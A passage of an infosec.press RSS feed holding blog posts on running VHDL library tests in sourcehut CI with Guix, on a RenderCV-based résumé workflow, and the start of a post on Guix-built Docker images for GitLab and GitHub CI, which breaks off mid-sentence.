<p>Let’s see how in detail using the <a href="https://man.sr.ht/~whereiseveryone/builds.sr.ht-guix-cookbook/" rel="nofollow">cookbook</a> as a starting point, and taking as a complete example the <code>fw-open-logic</code> #openlogic firmware package which comes with the <a href="https://infosec.press/csantosb/guix-channels#electronics-channel" rel="nofollow">electronics guix channel</a>. <br/>
Get it with: <br/></p>

<pre><code class="language-sh">guix install fw-open-logic:out
</code></pre>

<p><a href="https://github.com/open-logic/open-logic" rel="nofollow">Open logic</a> is a useful #vhdl library of commonly used components, implemented in a reusable and vendor/tool-independent way.  As any other #modernhw library, it includes tests sets for any of its components, using the <a href="https://infosec.press/csantosb/on-testing#vunit" rel="nofollow">vunit</a> utility in this case. <br/>
To run the full tests suite use (user wide using the default <code>$GUIX_PROFILE</code>), install its dependencies, defined in a <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/manifest.scm" rel="nofollow">manifest.scm</a> file (<code>ghdl-clang</code> and <code>python-vunit</code> in this case). <br/></p>

<pre><code class="language-sh">cd open-logic
guix install -m .builds/manifest.scm
cd sim
python3 run.py --ghdl -v
</code></pre>

<p>or local to the project, using <a href="https://infosec.press/csantosb/guix-crash-course#profiles-and-generations" rel="nofollow">a profile</a> <br/></p>

<pre><code class="language-sh">cd open-logic
mkdir _deps
export GUIX_PROFILE=open-logic/_deps
guix install -P $GUIX_PROFILE -m .builds/manifest.scm
. $GUIX_PROFILE/etc/profile
cd sim
python3 run.py --ghdl -v
</code></pre>

<h2 id="go-remote">go remote</h2>

<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/ci2.png" alt="img"> <br/>
Now, how do we proceed online using #sourcehut #ci <code>builds</code> facility ? <a href="https://infosec.press/csantosb/sourcehut-crash-course#builds" rel="nofollow">Builds</a> will pop up a new environment based on an up to date <code>guix-system</code> image when we push a commit to <code>git.sr.ht</code>, provided we include a <code>.build.yml</code> build manifest file, or by a <code>.build</code> folder with up to 4 build manifest files, at the root of the git project [1]. Be careful: consider that this image is <a href="https://git.sr.ht/~sircmpwn/builds.sr.ht/tree/master/item/images/guix" rel="nofollow">built daily</a> using a <a href="https://git.sr.ht/~sircmpwn/builds.sr.ht/tree/master/item/contrib/crontab" rel="nofollow">crontab</a> job, which is a good and a bad thing at the same time. From one side, you won’t be using the same environment for your tests, which breaks #reproducibility (see <strong>comments</strong> section below). On the other side, #guix is a rolling release, and new fancy features and new fixes are added every day. Keep this in mind. <br/>
Let’s create a <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds" rel="nofollow">.builds</a> folder in a topic <code>test branch</code>, with the following contents: <br/></p>

<p>    <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/manifest.scm" rel="nofollow">manifest.scm</a>, list of dependencies in our project <br/>
    <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/guix.scm" rel="nofollow">guix.scm</a>, default guix repository, redundant, included here for convenience <br/>
    <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/channels.scm" rel="nofollow">channels.scm</a>, list of <a href="https://infosec.press/csantosb/guix-channels" rel="nofollow">guix channels</a> remote repositories, in addition to the default guix repository, from where we pull packages <br/>
    We will be using here my own <a href="https://infosec.press/csantosb/guix-channels#electronics-channel" rel="nofollow">electronics channel</a> (no substitutes), as well as the <a href="https://codeberg.org/guix-science/guix-science" rel="nofollow">guix science</a> channel (which provides substitutes). <br/>
    (note how here we load the local <code>guix.scm</code> file, instead of making use of the <code>%default-channels</code> global variable) <br/></p>

<p>    <code>scheme
    (load &#34;guix.scm&#34;)
    ;;; %default-channels
</code>
    <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/key.pub" rel="nofollow">key.pub</a>, <a href="https://man.sr.ht/~whereiseveryone/builds.sr.ht-guix-cookbook/" rel="nofollow">auth key</a> to access <a href="https://infosec.press/csantosb/guix-crash-course#packages" rel="nofollow">substitutes</a> of packages in guix channels <br/></p>

<h3 id="build-manifests">build manifests</h3>

<p>From now on, every new push to the <code>test</code> #git branch will trigger the execution of the tasks defined in the three <a href="https://man.sr.ht/builds.sr.ht/#build-manifests" rel="nofollow">build manifest files</a> <br/></p>

<p>    <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/profile1.yml" rel="nofollow">profile1</a> <br/>
    <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/profile2.yml" rel="nofollow">profile2</a> <br/>
    <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/shell1.yml" rel="nofollow">shell1</a> <br/></p>

<p>The two profile build manifest files use a slightly different approach, and are given here for comparison purposes only. The shell build manifest uses an isolated shell container <em>within</em> the image itself to illustrate this feature. <br/>
Inside the manifests, I declare the image to use, <code>guix</code>, and the global environment variables sourced before each task is run: <code>prj</code> (project name), <code>srv</code> (list of servers with substitutes), <code>manifest</code> and <code>channels</code> (pointing to the corresponding files) and <code>key</code> (same). It is important to declare a trigger action, to receive an email with all relevant information in case of failure (log, id, commit, etc.). <br/></p>

<h3 id="tasks">tasks</h3>

<p>What’s interesting here is the list of tasks. Some of them are common to all three manifests <br/></p>

<p>    <strong>env</strong>, useful only for debugging <br/>
    <strong>guix__update__channels</strong>, replace the default project local <code>guix.scm</code> file by the output of <br/></p>

<p>    <code>sh
    guix describe --format=channels
</code></p>

<p>    The goal here is avoid pulling latest guix upstream, useless and cpu and time consuming, and using the local version instead. Remember that the guix system image we are using here is <a href="https://git.sr.ht/~sircmpwn/builds.sr.ht/tree/master/item/images/guix" rel="nofollow">updated daily</a>. <br/></p>

<p>        <strong>guix__auth</strong>, runs the authorize command to add the <code>key.pub</code> file to guix, so that we will be able to download package substitutes when necessary <br/></p>

<p>        <code>sh
        sudo guix archive --authorize &lt; &#34;$key&#34;
</code></p>

<p>        Here, one may opt by doing a <br/></p>

<p>        <code>sh
        guix pull --channels=&#34;$channels&#34;
</code></p>

<p>        as in <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/profile2.yml" rel="nofollow">profile2</a>, to set the revision of the guix channels we are using (remember channels are nothing but git repositories). <br/>
        Note how in <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/profile1.yml" rel="nofollow">profile1</a> and <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/shell1.yml" rel="nofollow">shell1</a> we opt for a different approach. <br/>
        <strong>guix__update__profile</strong>, where we create a <code>_deps</code> folder to be used as a local <code>$GUIX_PROFILE</code> (defined in <code>.envrc</code>). <br/>
        Then, one of <br/></p>

<p>        <code>sh
        # profile1
        guix time-machine --channels=&#34;$channels&#34; -- \
             package -p &#34;$GUIX_PROFILE&#34; \
             --substitute-urls=&#34;$srv&#34; \
             -m &#34;$manifest&#34;
</code></p>

<p>        or <br/></p>

<p>        <code>sh
        # profile2
        guix \
            package -p &#34;$GUIX_PROFILE&#34; \
            --substitute-urls=&#34;$srv&#34; \
            -m &#34;$manifest&#34;
</code></p>

<p>        will install packages in <code>$manifest</code> into the <code>$GUIX_PROFILE</code>. I’m using here the <a href="https://infosec.press/csantosb/guix-crash-course#time-machine" rel="nofollow">time-machine</a> mechanism to set the revision of the guix channels, depending if <code>guix pull</code> was run in the previous stage or not. <br/>
        <strong>vunit</strong>, sets env variables in <code>.envrc</code> and runs <code>python3 run.py --ghdl -v</code> inside <code>sim</code> directory <br/>
        Note that here, we are using <code>ghdl-clang</code> and <code>python-vunit</code> packages, provided respectively by <code>guix-science</code> and the <code>electronics</code> channel. <br/>
        <strong>guix__shell__test</strong>, used by <a href="https://git.sr.ht/~csantosb/ip.open-logic/tree/test/item/.builds/shell1.yml" rel="nofollow">shell1</a>, make use of <code>time-machine</code> (no former <code>guix pull</code>, then), to create a <a href="https://infosec.press/csantosb/guix-crash-course#time-machine%23shell-containers" rel="nofollow">shell container</a>, where to install project dependencies. Then, if calls inmediately <code>run.sh</code> to run the unit tests <br/></p>

<p>        <code>sh
        guix time-machine --channels=&#34;$channels&#34; -- shell -C --substitute-urls=&#34;$srv&#34; -m &#34;$manifest&#34; -- ./.builds/run.sh
</code></p>

<h2 id="comments">comments</h2>

<p>You may check the logs of <a href="https://builds.sr.ht/~csantosb/job/1384658" rel="nofollow">profile1</a>, <a href="https://builds.sr.ht/~csantosb/job/1384659" rel="nofollow">profile2</a> and <a href="https://builds.sr.ht/~csantosb/job/1384660" rel="nofollow">shell1</a> manifests, including a section with logs per task, to better understand what’s going on here. Remember that #sourcehut gives <a href="https://man.sr.ht/builds.sr.ht/build-ssh.md" rel="nofollow">ssh access</a> to the builds by connecting to the runners in case of failures, which provides a practical way of debugging the manifest files. <br/>
You may see how, using the remove guix image, it is possible to deploy a series of tasks to test our #modernhw design as we develop it: we will get an email in case of failure to pass the tests. Here, I present three approaches: <code>guix pulling</code> to set the repositories revisions on use; <code>time-machine</code>, to achieve the same, and <code>guix shell</code> to create an isolated container. These three alternatives are not necessary here, of course, but are given as a simple and practical demo of what can be achieved with #guix, #sourcehut and #ci. <br/>
To conclude this long post, it is important to stress once again that the point on using #guix resides in its <a href="https://infosec.press/csantosb/use-guix#reproducibility" rel="nofollow">reproducibility</a> capabilities. By keeping a couple of #plaintext files, namely the <a href="https://infosec.press/csantosb/guix-crash-course#manifest-channels" rel="nofollow">manifest.scm and channels.scm</a>, one can obtain #determinism in the execution of the tests. Even if the guix image is upgraded and rebuilt daily (and so it changes), by fixing the revision of our channels (remember, <code>guix pull</code> or <code>guix time-machine</code>) we obtain always the same products out of our tests, as we run the same (project and tests) code, within exactly the same environment. <br/></p>

<hr>

<p>[1] It is also possible to automatically submit builds when a patch to a repo with build manifests is sent to a mailing list. This is achieved by appending the project name as a prefix to the subject of the message, for example [PATCH project-name]. <br/></p>
]]></content:encoded>
      <author>csantosb</author>
      <guid>https://infosec.press/read/a/s1dxhl1qxp</guid>
      <pubDate>Fri, 13 Dec 2024 10:18:11 +0000</pubDate>
    </item>
    <item>
      <title>Creating a Text-based Résumé workflow</title>
      <link>https://infosec.press/ktneely/creating-a-text-based-resume-workflow</link>
      <description>&lt;![CDATA[A resume workflow from neurond.com&#xA;Image: a typical resume content extraction workflow from neurond.com&#xA;&#xA;I used to keep my résumé (from here, “resume”) very up-to-date.  For a long time, I had a resume crafted in #LaTeX because I have a long history with using that typesetting and markup language for purposes other than the ones most people think of, e.g. I wrote my college English papers in it, I had a slew of templates I created while I was a practicing attorney that would create letters, motions, and envelopes from source .tex files, etc.   Keeping content in text makes it more portable across platforms and applications, and the nature of Microsoft Word is that you need to fully re-create the resume every couple years because some invisible formatting munges the entire document.&#xA;&#xA;TL;DR I ended up using RenderCV as mentioned below in the  [[Resume Workflow#RenderCV|RenderCV section]].&#xA;&#xA;In the time since I last relied upon a resume, the method of applying for jobs –and more importantly, how recruiters review submissions– has changed pretty drastically.  And despite all the great advances in technology over the past ten years, apparently, HR systems still are not that great at parsing a PDF or Word doc into text that can be machine-read by whatever algorithms and/or AI they’re using to perform the first pass.  Because of this, you want to make sure to submit a machine-friendly description of your experience.  There really should be a standard for all this stuff that makes it easy on both the applicant and the hiring manager.  Like, I don’t know, some sort of HR standards body or something.  A standard has never emerged, and I suspect that LinkedIn has a lot to do with that.  &#xA;&#xA;Additionally, having an easy way to keep one’s resume in sync and in multiple formats means that it can be quickly used for many purposes, from printing an attractive hard copy to piping it through some [[Fabric]] AI workflows.  So this set me on a fairly long hunt for a system where I could write once, and generate in multiple formats.  &#xA;&#xA;The search for a resume workflow&#xA;&#xA;First round&#xA;LaTeX &amp; Pandoc&#xA;&#xA;Since my resume was already in LaTeX, using the 20 second CV set of template –which I think is very nice– I went and updated that and then ran it through pandoc, which is a multi-format document converter.  The results ended up being pretty poor and not useful.  The PDF looked great, obviously, but pandoc did not understand the LaTeX very well and the Markdown required a lot of edits.  &#xA;&#xA;We want everything to look good upon compilation/export/save as/whatever, so this was not an option.&#xA;&#xA;Interlude&#xA;I had kind of given up at this point, figuring I either needed to just go Google Docs or maintain a Markdown version and attempt to keep them in sync.  Then, I came across a post about an auto-application bot and the author had a related project that used resume information formatted as YAML to create a specific resume based upon job description or LinkedIn post.  &#xA;Resume from Job Description&#xA;&#xA;This project is called resume render from job description (no cute animal names or obtuse references in this project!), and I gave it a try, but it appeared to require all the fields, including e.g. GPA.  I don’t know about you, but I&#39;m way past the point in my career where I&#39;m putting my GPA on a resume, so it wasn’t that useful.&#xA;&#xA;It was late on a Thursday night, so obviously it was time to look a bit further into the rabbit hole&#xA;&#xA;Online options&#xA;&#xA;I found a number of projects that were a service model where they host and render the resume for you.  These included resume.lol (I question the naming choice here), Reactive resume (opensource, excellent domain name, and it has nice documentation), and WTF resume  (my thought exactly!).&#xA;&#xA;These all came from a post of 14 Open-source Free Resume Builder and CV Generator Apps.&#xA;JSONResume&#xA;&#xA;As I traveled further down the Internet search rabbit hole, I came across JSON Resume, an #opensource project with a hosting component where people craft their resumes in JSON and it can then render in a number of formats either via a command-line tool or within their hosted service, making it a kind of hybrid option. &#xA;&#xA;At this point, I felt like I was almost there, but it wasn’t exactly what I wanted.  JSONResume is very focused around being part of their ecosystem and publishing within their hosting ecosystem.  The original #CLI tool is no longer maintained, and a new one is being worked on, which appears minimal but sufficient for the task.  A nice thing is that they have some add-ons and have created a sort of ecosystem of tools.  Looking over the project’s 10 year history, those tools have a tendency to come and go, but such is the nature of OSS.  &#xA;&#xA;The Award for “Project Most Suited to My Workflow” goes to….&#xA;&#xA;Another great thing about JSON Resume is that they, i.e. Thomas Davis, have done a fantastic job of cataloging various resume systems out there in their JSON Resume projects section.  There is so much interesting stuff here –and a lot of duplicative effort ahem see the “HR Standards” comment above– that you can spend a couple days looking for the project that best fits your needs.  For me, I landed on RenderCV, which is not only in the bibliography, but also mentioned on the Getting Started page because there are tools to leverage JSON Resume from RenderCV!  &#xA;&#xA;So without further ado…&#xA;RenderCV&#xA;&#xA;While RenderCV is a part of the JSON Resume ecosystem, in that people have created scripts to convert from the latter to the former, it is a completely separate and standalone project.  Written in #python and installable via pip.  RenderCV’s approach is to leverage a YAML file, and from that generate consistent resumes in PDF, HTTML, Markdown, and even individual PNG files, allowing the applicant to meet whatever arcane requirements the prospective employer has.&#xA;&#xA;graph LR&#xA;&#xA;&#x9;YAML --  TeX &amp; Markdown &#xA;&#x9;TeX --  PDF &amp; HTML &amp; PNG&#xA;Resume generation workflow&#xA;&#xA;Using RenderCV&#xA;&#xA;Getting started with RenderCV is like pretty much any other project built in python&#xA;&#xA;Create a virtual environment using venv or conda, e.g. conda create -n renderCV python=3.12.4&#xA;Install via pip with a simple command pip install rendercv&#xA;Follow the quick start guide and create a YAML file with your information in it&#xA;Run rendercv render mycv.yaml&#xA;View the lovely rendered résumé &#xA;&#xA;Extending RenderCV&#xA;&#xA;This was great, as I now have a very easy-to-edit source document for my résumé and can quickly create others.  I’m hoping Sina, the author, makes the framework a bit more extensible in the future because the current templates are oriented toward people with STEM backgrounds looking for individual contributor roles.  However, as some of us move further in our careers, the résumé should be less about skills and projects, but more about responsibilities and accomplishments as we lead teams.  I have enhanced the “classic” and “sb2nov” themes so that they take these keywords as subsections to a specific company/role combination under the professionalexperience section.&#xA;&#xA;Theme update for Leaders and Managers&#xA;&#xA;I created a fork which contains updates to v1.14, adding the &#34;Responsibilities&#34; and &#34;Accomplishments&#34; subsections for company: under the Experience section.  &#xA;This allows leaders to craft their resume or CV in such a way that it highlights the breadth of their influence and impact to the organization.&#xA;&#xA;The following themes support the additional subsections:&#xA;  markdown&#xA;  classic&#xA;  sb2nov&#xA;&#xA;A non-updated theme will simply ignore the content under these subsections; omitting these sections will make the resume look like the original theme.&#xA;Hopefully the framework will be more extensible in the future and I can add this as a pull request.  &#xA;In the meantime, the forked repo at https://github.com/ktneely/rendercv4leaders should work on its own, or the /ExperienceEntry.j2.tex and /ExperienceEntry.j2.md files from those themes can simply be copied over the existing.&#xA;&#xA;How to use&#xA;Usage is extremely straightforward, as this merely extends the framework with a couple new keywords for the Experience section and looking for a preceding company declaration.  Here is an example:&#xA;&#xA;professionalexperience:&#xA;  company: NASA&#xA;&#x9;position: Director of Flight Operations&#xA;&#x9;location: Houston, TX&#xA;&#x9;startdate: 1957-03&#xA;&#x9;enddate: 1964-06&#xA;&#x9;responsibilities:&#xA;&#x9;  Manage the Control room.&#xA;&#x9;  Write performance reports.&#xA;&#x9;  Smoke copious amounts of cigarettes&#xA;&#x9;accomplishments:&#xA;&#x9;  100% staff retention over the course of 9 rocket launches.&#xA;&#x9;  Mobilized and orchestrated multiple teams to rescue astronauts trapped in space.&#xA;&#x9;  Lung cancer.&#xA;&#xA;This will then render “responsibilities” and “accomplishments” as italicized sections under the job role, highlighting what a difference made while performing in that role.&#xA;&#xA;Maintaining Multiple Versions&#xA;&#xA;This is basically what it all comes down to: the ability to maintain different versions for your target companies.  While some work is being done to modularize the source content, it is not yet to the point where each section of the resume is a building block that can be invoked at compile time.  What I do is maintain different YAML files and use the parameters in the rendercvsettings section to direct the output to different, meaningfully-named directories while maintaining a generic name for the file itself.  &#xA;&#xA;So, instead of “Kevin-LargeCorprole.pdf”, “Kevin-Startuprole.pdf”, etc., I simply send “Kevin-CV.pdf&#34;.  This way, it’s not incredibly obvious to the reviewer that I have specially-crafted a resume for that job, it just happens to look like I have exactly what they’re looking for in my default resume.&#xA;&#xA;Automation&#xA;&#xA;Want to automate the build of your resume whenever you update the source file(s)?  Look no further than rendercv pipeline to generate the output whenever you commit source to GitHub.&#xA;&#xA;Also, since version 1.15, the --watch flag will watch the source file locally and re-compile every time you save the source YAML file. &#xA;&#xA;References and further exploration&#xA;&#xA;Neurond.com blog post: What is a CV/Resume Parser and How Does it Work?, Trinh Nguyen, Aug 16, 2022.&#xA;TeXMaker: an Open-source TeX editor &#xA;RenderCV user guide ]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://www.neurond.com/static/45ee6c3b93a4d8199f149c31e48b2d69/e4e91/neurond-cv-parsing-process.png" alt="A resume workflow from neurond.com">
<strong>Image: a typical resume content extraction workflow from neurond.com</strong></p>

<p>I used to keep my résumé (from here, “resume”) very up-to-date.  For a long time, I had a resume crafted in #LaTeX because I have a long history with using that typesetting and markup language for purposes other than the ones most people think of, e.g. I wrote my college English papers in it, I had a slew of templates I created while I was a practicing attorney that would create letters, motions, and envelopes from source <code>.tex</code> files, etc.   Keeping content in text makes it more portable across platforms and applications, and the nature of Microsoft Word is that you need to fully re-create the resume every couple years because some invisible formatting munges the entire document.</p>

<p><strong>TL;DR</strong> I ended up using <a href="https://github.com/sinaatalay/rendercv" rel="nofollow">RenderCV</a> as mentioned below in the  [[Resume Workflow#RenderCV|RenderCV section]].</p>

<p>In the time since I last relied upon a resume, the method of applying for jobs –and more importantly, how recruiters review submissions– has changed pretty drastically.  And despite all the great advances in technology over the past ten years, apparently, HR systems still are not that great at parsing a PDF or Word doc into text that can be machine-read by whatever algorithms and/or AI they’re using to perform the first pass.  Because of this, you want to make sure to submit a machine-friendly description of your experience.  There really should be a standard for all this stuff that makes it easy on both the applicant and the hiring manager.  Like, I don’t know, some sort of <a href="https://www.hropenstandards.org/" rel="nofollow">HR standards body</a> or something.  A standard has never emerged, and I suspect that LinkedIn has a lot to do with that.</p>

<p>Additionally, having an easy way to keep one’s resume in sync and in multiple formats means that it can be quickly used for many purposes, from printing an attractive hard copy to piping it through some [[Fabric]] AI workflows.  So this set me on a fairly long hunt for a system where I could write once, and generate in multiple formats.</p>

<h1 id="the-search-for-a-resume-workflow">The search for a resume workflow</h1>

<h2 id="first-round">First round</h2>

<h3 id="latex-pandoc">LaTeX &amp; Pandoc</h3>

<p>Since my resume was already in LaTeX, using the <a href="https://github.com/spagnuolocarmine/TwentySecondsCurriculumVitae-LaTex" rel="nofollow">20 second CV</a> set of template –which I think is very nice– I went and updated that and then ran it through <code>pandoc</code>, which is a multi-format document converter.  The results ended up being pretty poor and not useful.  The PDF looked great, obviously, but pandoc did not understand the LaTeX very well and the Markdown required a lot of edits.</p>

<p>We want everything to look good upon compilation/export/save as/whatever, so this was not an option.</p>

<h2 id="interlude">Interlude</h2>

<p>I had kind of given up at this point, figuring I either needed to just go Google Docs or maintain a Markdown version and attempt to keep them in sync.  Then, I came across a post about an <a href="https://github.com/feder-cr/linkedIn_auto_jobs_applier_with_AI" rel="nofollow">auto-application bot</a> and the author had a related project that used resume information formatted as <a href="https://yaml.org/" rel="nofollow">YAML</a> to create a specific resume based upon job description or LinkedIn post.</p>

<h3 id="resume-from-job-description">Resume from Job Description</h3>

<p>This project is called <a href="https://github.com/feder-cr/resume_render_from_job_description" rel="nofollow">resume render from job description</a> (no cute animal names or obtuse references in <em>this</em> project!), and I gave it a try, but it appeared to <em>require</em> all the fields, including e.g. GPA.  I don’t know about you, but I&#39;m way past the point in my career where I&#39;m putting my GPA on a resume, so it wasn’t that useful.</p>

<p>It was late on a Thursday night, so obviously it was time to look a bit further into the rabbit hole</p>

<h3 id="online-options">Online options</h3>

<p>I found a number of projects that were a service model where they host and render the resume for you.  These included <a href="https://www.resume.lol/" rel="nofollow">resume.lol</a> (I question the naming choice here), <a href="https://docs.rxresu.me/" rel="nofollow">Reactive resume</a> (opensource, excellent domain name, and it has nice documentation), and <a href="https://medevel.com/15-os-resume-builder/" rel="nofollow">WTF resume</a>  (my thought exactly!).</p>

<p>These all came from a post of <a href="https://medevel.com/15-os-resume-builder/" rel="nofollow">14 Open-source Free Resume Builder and CV Generator Apps</a>.</p>

<h4 id="jsonresume">JSONResume</h4>

<p>As I traveled further down the Internet search rabbit hole, I came across <a href="https://jsonresume.org/" rel="nofollow">JSON Resume</a>, an #opensource project with a hosting component where people craft their resumes in <a href="https://json.org/" rel="nofollow">JSON</a> and it can then render in a number of formats either via a command-line tool or within their hosted service, making it a kind of hybrid option.</p>

<p>At this point, I felt like I was <em>almost there</em>, but it wasn’t exactly what I wanted.  JSONResume is very focused around being part of their ecosystem and publishing within their hosting ecosystem.  The original #CLI tool is no longer maintained, and a new one is being worked on, which appears minimal but sufficient for the task.  A nice thing is that they have some add-ons and have created a sort of ecosystem of tools.  Looking over the project’s 10 year history, those tools have a tendency to come and go, but such is the nature of OSS.</p>

<h2 id="the-award-for-project-most-suited-to-my-workflow-goes-to">The Award for “Project Most Suited to My Workflow” goes to….</h2>

<p>Another great thing about JSON Resume is that they, i.e. Thomas Davis, have done a fantastic job of cataloging various resume systems out there in their <a href="https://jsonresume.org/projects" rel="nofollow">JSON Resume projects</a> section.  There is so much interesting stuff here –and a lot of duplicative effort <em>ahem</em> see the “HR Standards” comment above– that you can spend a couple days looking for the project that best fits your needs.  For me, I landed on RenderCV, which is not only in the bibliography, but also mentioned on the <a href="https://jsonresume.org/getting-started" rel="nofollow">Getting Started</a> page because there are tools to leverage JSON Resume from RenderCV!</p>

<p>So <em>without further ado…</em></p>

<h3 id="rendercv">RenderCV</h3>

<p>While <a href="https://github.com/sinaatalay/rendercv" rel="nofollow">RenderCV</a> is a part of the JSON Resume ecosystem, in that people have created scripts to convert from the latter to the former, it is a <em>completely separate and standalone project</em>.  Written in #python and installable via <code>pip</code>.  RenderCV’s approach is to leverage a YAML file, and from that generate consistent resumes in PDF, HTTML, Markdown, and even individual PNG files, allowing the applicant to meet whatever arcane requirements the prospective employer has.</p>

<pre><code class="language-mermaid">graph LR

	YAML --&gt; TeX &amp; Markdown 
	TeX --&gt; PDF &amp; HTML &amp; PNG
</code></pre>

<p><em>Resume generation workflow</em></p>

<h4 id="using-rendercv">Using RenderCV</h4>

<p>Getting started with RenderCV is like pretty much any other project built in python</p>
<ol><li>Create a virtual environment using <code>venv</code> or <code>conda</code>, e.g. <code>conda create -n renderCV python=3.12.4</code></li>
<li>Install via pip with a simple command <code>pip install rendercv</code></li>
<li>Follow the <a href="https://github.com/sinaatalay/rendercv?tab=readme-ov-file#quick-start-guide" rel="nofollow">quick start guide</a> and create a YAML file with your information in it</li>
<li>Run <code>rendercv render &lt;my_cv&gt;.yaml</code></li>
<li>View the lovely rendered résumé</li></ol>

<h4 id="extending-rendercv">Extending RenderCV</h4>

<p>This was great, as I now have a very easy-to-edit source document for my résumé and can quickly create others.  I’m hoping Sina, the author, makes the framework a bit more extensible in the future because the current templates are oriented toward people with STEM backgrounds looking for individual contributor roles.  However, as some of us move further in our careers, the résumé should be less about skills and projects, but more about responsibilities and accomplishments as we lead teams.  I have enhanced the “classic” and “sb2nov” themes so that they take these keywords as subsections to a specific company/role combination under the <code>professional_experience</code> section.</p>

<h5 id="theme-update-for-leaders-and-managers">Theme update for Leaders and Managers</h5>

<p>I <a href="https://github.com/ktneely/rendercv4leaders" rel="nofollow">created a fork</a> which contains updates to v1.14, adding the “Responsibilities” and “Accomplishments” subsections for <code>company:</code> under the Experience section.<br>
This allows leaders to craft their resume or CV in such a way that it highlights the breadth of their influence and impact to the organization.</p>

<p>The following themes support the additional subsections:
  – markdown
  – classic
  – sb2nov</p>

<p>A non-updated theme will simply ignore the content under these subsections; omitting these sections will make the resume look like the original theme.
Hopefully the framework will be more extensible in the future and I can add this as a pull request.<br>
In the meantime, the forked repo at <a href="https://github.com/ktneely/rendercv4leaders" rel="nofollow">https://github.com/ktneely/rendercv4leaders</a> should work on its own, or the <code>/ExperienceEntry.j2.tex</code> and <code>/ExperienceEntry.j2.md</code> files from those themes can simply be copied over the existing.</p>

<h5 id="how-to-use">How to use</h5>

<p>Usage is extremely straightforward, as this merely extends the framework with a couple new keywords for the <em>Experience</em> section and looking for a preceding <code>company</code> declaration.  Here is an example:</p>

<pre><code class="language-yaml">professional_experience:
  - company: NASA
	position: Director of Flight Operations
	location: Houston, TX
	start_date: 1957-03
	end_date: 1964-06
	responsibilities:
	  - Manage the Control room.
	  - Write performance reports.
	  - Smoke copious amounts of cigarettes
	accomplishments:
	  - 100% staff retention over the course of 9 rocket launches.
	  - Mobilized and orchestrated multiple teams to rescue astronauts trapped in space.
	  - Lung cancer.
</code></pre>

<p>This will then render “responsibilities” and “accomplishments” as italicized sections under the job role, highlighting what a difference made while performing in that role.</p>

<h4 id="maintaining-multiple-versions">Maintaining Multiple Versions</h4>

<p>This is basically what it all comes down to: the ability to maintain different versions for your target companies.  While some work is being done to modularize the source content, it is not yet to the point where each section of the resume is a building block that can be invoked at compile time.  What I do is maintain different YAML files and use the parameters in the <code>rendercv_settings</code> section to direct the output to different, meaningfully-named directories while maintaining a generic name for the file itself.</p>

<p>So, instead of “Kevin-LargeCorp<em>role.pdf”, “Kevin-Startup</em>role.pdf”, etc., I simply send “Kevin-CV.pdf”.  This way, it’s not incredibly obvious to the reviewer that I have specially-crafted a resume for that job, it just happens to look like I have exactly what they’re looking for in my default resume.</p>

<h4 id="automation">Automation</h4>

<p>Want to automate the build of your resume whenever you update the source file(s)?  Look no further than <a href="https://github.com/rendercv/rendercv-pipeline" rel="nofollow">rendercv pipeline</a> to generate the output whenever you commit source to GitHub.</p>

<p>Also, since <a href="https://github.com/rendercv/rendercv/releases/tag/v1.15" rel="nofollow">version 1.15</a>, the <code>--watch</code> flag will watch the source file locally and re-compile every time you save the source YAML file.</p>

<h2 id="references-and-further-exploration">References and further exploration</h2>
<ol><li>Neurond.com blog post: <a href="https://www.neurond.com/blog/what-is-a-cv-resume-parser-how-it-works" rel="nofollow">What is a CV/Resume Parser and How Does it Work?</a>, Trinh Nguyen, Aug 16, 2022.</li>
<li><a href="https://www.xm1math.net/texmaker/" rel="nofollow">TeXMaker: an Open-source TeX editor</a></li>
<li><a href="https://docs.rendercv.com/user_guide/" rel="nofollow">RenderCV user guide</a></li></ol>
]]></content:encoded>
      <author>Kevin Neely&#39;s Security Notes</author>
      <guid>https://infosec.press/read/a/c0lhi3u1h9</guid>
      <pubDate>Thu, 12 Dec 2024 18:12:55 +0000</pubDate>
    </item>
    <item>
      <title>ci (gitlab/hub)</title>
      <link>https://infosec.press/csantosb/ci-gitlab-hub</link>
      <description>&lt;![CDATA[img br/&#xA;Remote #ci is the way to go in #modernhw digital design testing. In this #ciseries, let’s see it in practice with some detail using two of the most popular forges out there. !--more-- br/&#xA;&#xA;Gitlab&#xA;&#xA;The gitlab #gitforge includes tones of features. Among these, a facility called the container registry, which stores per project container images. Guix pack allows the creation of custom #reproductible environments as images. In particular, it is possible to create a docker image out of our manifest and channels files with br/&#xA;&#xA;guix time-machine -C channels.scm -- pack --compression=xz --save-provenance -f docker -m manifest.scm&#xA;&#xA;Check the documentation for options. br/&#xA;Remember that there are obviously alternative methods to produce docker images. The point on using guix resides on its reproducibility capabilities: you’ll be able to create a new, identical docker image, out of the manifest and channels files at any point in time. Even more: you’ll have the capacity to retrieve your manifest file out of the binary image in case your manifest file gets lost. br/&#xA;Then, this image must be loaded into the local docker store with br/&#xA;&#xA;docker load &lt; IMAGE&#xA;&#xA;and renamed to something meaningful br/&#xA;&#xA;docker tag IMAGE:latest gitlab-registry.whatever.fr/domain/group/NAME:TAG&#xA;&#xA;go remote&#xA;&#xA;img br/&#xA;Finally, pushed to the remote container registry of your project with br/&#xA;&#xA;docker push gitlab-registry.whatever.fr/domain/group/NAME:TAG&#xA;&#xA;At this point, you have an environment where you’ll run your tests using gitlab&#39;s ci features. You’ll set up your gitlab’s runners and manifest files to use this container to execute your jobs. br/&#xA;As an alternative, you could use a ssh executor running on your own fast and powerful hardware resources (dedicated machine, shared cluster, etc.). In this case, you’d rather produce an apptainer  container image with: br/&#xA;&#xA;guix time-machine -C channels.scm -- pack -f squashfs ...&#xA;&#xA;scp this container file to your computing resources and call it from the #gitlab runner. br/&#xA;&#xA;Github&#xA;&#xA;The github is probably the most popular #gitforge out there. It follows a similar to #gitlab in its conception (pull requests and merge requests, you catch the 